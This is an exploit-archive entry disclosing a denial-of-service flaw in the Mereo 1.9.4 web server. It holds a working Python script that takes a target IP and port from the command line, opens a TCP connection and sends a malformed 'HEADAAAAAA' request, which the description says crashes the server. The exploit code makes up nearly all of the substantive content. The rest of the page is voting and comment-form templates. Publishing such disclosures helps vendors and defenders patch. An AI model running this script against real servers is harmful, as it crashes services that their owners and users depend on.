Mereo 1.9.4 Denial Of Service

2020.06.23

Credit: Saeed reza Zamanian

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#!/usr/bin/python
'''
# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service
# Date: 06-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/mereo/
# Software Link: https://sourceforge.net/projects/mereo/files/
# Version: 1.9.4
# Tested on: Windows 7 , Windows Vista
# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is
not supported with the application, so it will be caused to crash.
Usage:
python mereo194_dos.py 1.2.3.4 80
'''
import socket
import os
import sys
if len(sys.argv) != 3:
print "Usage: python mereo194_dos.py targetIP targetPort"
else:
print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))
expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41")
expl.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mereo 1.9.4 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.